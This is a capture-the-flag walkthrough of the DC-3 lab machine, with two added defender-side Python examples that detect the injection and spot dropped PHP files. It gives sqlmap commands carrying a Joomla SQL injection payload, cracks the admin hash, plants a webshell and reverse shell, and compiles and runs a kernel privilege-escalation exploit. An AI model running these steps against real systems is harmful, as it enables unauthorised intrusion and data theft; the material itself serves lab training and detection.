A few words up front: the steps before the privilege escalation were completed a month ago. At that time there was a problem with the privilege escalation and it was shelved; it was only completed today, so the IP address may have changed. Note: the IP address that appears later is 192.168.200.55, which is also the target IP address. If this article is of help to you, I would be honored.
1. Set up the environment
1. Tools
Attacker machine: kali (192.168.200.14)
Target machine: DC-3 (IP unknown)
2. Note
The attacker machine and the target machine must use the same network connection mode. The network connection mode of DC-1 is NAT, the same as kali's (bridged mode can also be chosen).
DC-1 network settings
After clicking Advanced you can view the MAC address of the DC-1 target machine, which helps identify it when scanning for its IP.
2. Information collection
1. Scan for live hosts in the same network segment
Using the MAC address of the DC-3 target machine, determine its IP address from the scan results
Method one:
arp-scan -l
Method two:
nmap -sP 192.168.200.0/24 -T4
Method three:
netdiscover
2. Scan target IP open ports
nmap -sV -p- 192.168.200.8
# -sV: detect the version of the software running on each open port
# -p-: scan all ports 0-65535
You can see that only port 80 is open on this host
3. Scan for backend directories
Using the dirsearch tool you can see the administrator directory, which should be the backend
4. Fingerprinting
Open the website
A well-known CMS
The English text on the left reads:
This time, there is only one flag, one entry point, and no clues. To get this flag you obviously have to gain root privileges (elevated privileges). How you become a root is up to you – and, obviously, the system. Good luck and I hope you enjoy this little challenge.
Scan using joomscan
joomscan -u http://192.168.200.8/
joomscan installation:
sudo apt-get install joomscan
General approach: search Baidu for vulnerabilities matching the framework version; first locate the backend login directory
After searching on Baidu, the corresponding SQL injection vulnerability can be found
Use the lookup tool in kali to find the vulnerability
View the file
5. Backend cracking
sqlmap lists the database names
sqlmap -u "http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
The payload is built from the sqlmap command that was provided
sqlmap lists all table names in the joomladb database
sqlmap -u "http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]
The #__users table is found
List the columns of the users table
sqlmap -u "http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
Columns in #__users
Identify the account columns; the account name and password are generally in the username and password columns
Dump the data
sqlmap -u "http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb -T '#__users' -C id,name,password,username --dump
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu # bcrypt password hash
Use the john tool in kali to crack it
vi admin.txt # write the hash into the file
john admin.txt # crack it
After cracking, the login password is snoopy and the account is admin
Log in to the backend
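As an added defender-side example (not part of the original writeup), the detection logic below scans constructed Apache access-log lines for the com_fields list[fullordering] injection that sqlmap is driven against above; the log lines, IPs and the sqlmap User-Agent string are assumptions. Because the writeup runs sqlmap with --random-agent, the User-Agent check alone is not enough, which is why the parameter-shape and SQL-function checks carry the weight.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not taken from the post.
# Lines 2 and 3 carry the com_fields list[fullordering] error-based injection (line 3 is
# percent-encoded and sent with a default sqlmap User-Agent); line 4 is a legitimate sort.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,version()),1) HTTP/1.1" 500 310 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%28NULL%2Cconcat%280x3a%2Cuser%28%29%29%2CNULL%29 HTTP/1.1" 500 310 "-" "sqlmap/1.7"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.name%20ASC HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# A legitimate fullordering value is a column name optionally followed by ASC/DESC.
ORDERING_OK = re.compile(r'^[A-Za-z0-9_.]+(\s+(ASC|DESC))?$', re.IGNORECASE)
# SQL functions that have no business in a sort-order parameter.
SQL_FUNC = re.compile(
    r'\b(updatexml|extractvalue|concat|sleep|benchmark|version|user)\s*\(', re.IGNORECASE)

def analyse_line(line):
    """Return a finding for a suspicious com_fields request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    qs = parse_qs(urlsplit(m['url']).query, keep_blank_values=True)  # decodes %xx once
    if qs.get('option', [''])[0] != 'com_fields':
        return None
    ordering = qs.get('list[fullordering]', [''])[0]
    reasons = []
    if ordering and not ORDERING_OK.match(ordering):
        reasons.append('fullordering_not_a_column')
    if SQL_FUNC.search(ordering):
        reasons.append('sql_function_in_ordering')
    if m['ua'].lower().startswith('sqlmap'):
        reasons.append('sqlmap_user_agent')
    if not reasons:
        return None
    return {'ip': m['ip'], 'status': int(m['status']), 'ordering': ordering, 'reasons': reasons}

def suspicious_requests(log_text):
    """Scan a whole log and return the findings in log order."""
    return [f for f in map(analyse_line, log_text.splitlines()) if f]

if __name__ == '__main__':
    for finding in suspicious_requests(SAMPLE_LOG):
        print(finding)
```

The 500 status on the flagged requests is a second signal worth correlating: error-based injection through updatexml relies on the database raising an error that the page then leaks.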
3. Vulnerability detection
Upload Webshell
The website's source code can be found, and the PHP files in the template can be edited.
The Joomla backend allows templates to be edited; use this function to create test.php under the template, write a one-line webshell into it, and AntSword connects successfully.
The path of the uploaded one-line webshell is shown below. At this point you can browse the website directory and open a virtual terminal.
The template path requested (accessing the current folder directly returns the contents of that folder)
http://192.168.200.8/templates/beez3/html/
Reverse shell
Upload a reverse-shell file into the /templates/beez3 template and note the upload path. The file is created by you; in this article it is named shell.php.
Reverse shell obtained
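Added defender-side example (not code from the post): the backend template editor used above turns a static template directory into a writable one, so a file-integrity baseline of templates/ catches test.php and shell.php the moment they appear. The directory layout, file names and contents are constructed, and the check runs on a temporary directory so it works offline.

```python
import hashlib
import os
import tempfile

def snapshot(root):
    """Map every file below root (path relative to root, '/'-separated) to its SHA-256."""
    digests = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            with open(full, 'rb') as fh:
                rel = os.path.relpath(full, root).replace(os.sep, '/')
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def compare(baseline, current):
    """Return (added, modified, removed) relative paths between two snapshots."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return added, modified, removed

def changed_php_files(baseline, current):
    """PHP files added or altered since the baseline. A deployed template directory is
    static, so any hit here deserves a look, editor-created files included."""
    added, modified, _ = compare(baseline, current)
    return sorted(p for p in added + modified if p.lower().endswith('.php'))

def demo():
    """Constructed scenario mirroring the walkthrough: a clean beez3 template, then the
    backend template editor is used to drop test.php and shell.php into it."""
    with tempfile.TemporaryDirectory() as site:
        tpl = os.path.join(site, 'templates', 'beez3')
        for rel, body in [('index.php', b'<?php // template entry point ?>'),
                          ('html/modules.php', b'<?php // legitimate override ?>'),
                          ('css/template.css', b'body {}')]:
            path = os.path.join(tpl, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, 'wb') as fh:
                fh.write(body)
        baseline = snapshot(site)  # taken right after deployment
        # Post-compromise changes (constructed): two new PHP files and one edited file.
        with open(os.path.join(tpl, 'html', 'test.php'), 'wb') as fh:
            fh.write(b'<?php /* placeholder for the webshell */ ?>')
        with open(os.path.join(tpl, 'shell.php'), 'wb') as fh:
            fh.write(b'<?php /* placeholder for the reverse shell */ ?>')
        with open(os.path.join(tpl, 'index.php'), 'ab') as fh:
            fh.write(b'\n// tampered')
        return changed_php_files(baseline, snapshot(site))

if __name__ == '__main__':
    print(demo())
```

In production the baseline would be stored off-host (or signed) and the comparison scheduled, since an attacker with write access to the web root can also rewrite a baseline kept next to it.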
Use EXP
Use the searchsploit tool to search for Ubuntu 16.04 privilege escalation; a "denial of service vulnerability" is found that can be used to escalate privileges
searchsploit ubuntu 16.04
View the vulnerability and download the EXP
cp /usr/share/exploitdb/exploits/linux/local/39772.txt shell.txt
cat shell.txt
The file contents give the EXP download URL
Download it (this step is carried out on the target machine; the step as shown here was performed incorrectly)
Unzip the files
unzip 39772.zip # unzip the 39772.zip file
cd 39772
tar -xvf exploit.tar # unpack the exploit tarball containing the privilege escalation script
cd ebpf_mapfd_doubleput_exploit
Privilege escalation
Compile the code
./compile.sh # run the script to compile the files
Escalate privileges and obtain root
./doubleput # run the privilege escalation binary
Wait a moment
Article reference: https://blog.csdn.net/weixin_43583637/article/details/101554815